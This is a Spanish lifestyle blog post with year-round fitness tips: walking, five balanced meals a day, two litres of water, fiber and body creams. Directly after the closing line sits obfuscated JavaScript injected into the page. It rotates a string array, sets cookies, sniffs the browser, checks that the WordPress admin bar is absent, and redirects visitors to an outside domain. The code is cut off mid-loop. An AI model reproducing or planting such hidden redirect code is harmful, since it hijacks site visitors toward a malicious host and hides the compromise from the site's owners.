Por regla general, con la llegada de la primavera, nos entran unas ganas repentinas de cuidarnos haciendo dietas y deporte, para lucir un cuerpo perfecto durante el verano. Y lamentablemente el resto del año, nos olvidamos de esa vida sana que tanto nos obsesiona durante la primavera.

Pues bien, hay que concienciarse que estos cuidados extra, deberíamos realizarlos durante todo el año. Os voy a dar unas pautas a seguir para estar en forma todos los meses del año:

 

  • Apúntate al gimnasio o si no tienes la posibilidad de hacerlo, solo debes llevar a cabo una vida menos sedentaria. Puedes comenzar por ir a caminar todos los días al menos una hora, o patinar, correr… Poco a poco te irás acostumbrando a llevar una vida más activa. ¡Ánimo que tú puedes!
  • Acostúmbrate a hacer 5 comidas al día con una dieta equilibrada (desayuno, almuerzo, comida, merienda y cena). E intenta no comer nada antes de acostarte, porque si te acuestas con el estomago lleno, no conseguirás hacer bien la digestión. Lo ideal es que la última comida se al menos 3 horas antes de acostarte.
  • Es recomendable beber al menos 2 litros de agua al día y puedes compaginarlos con infusiones, que además son diuréticas y conseguirás depurarte por dentro.
  • También añade fibra a tu dieta, ya que es muy buena para el sistema digestivo y tiene efectos beneficiosos para el organismo.
  • Y por último, no olvides combinar esta forma de vida con el uso de tu crema corporal favorita, ya sea anti-celulítica, reductora, reafirmante…

¡No dejes que te pille el toro y empieza lo antes posible tu operación bikini! Y si puedes conseguirlo, lo ideal es cuidarte durante todo el año. ¡Apuesta por una vida sana y saludable! 😉 var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone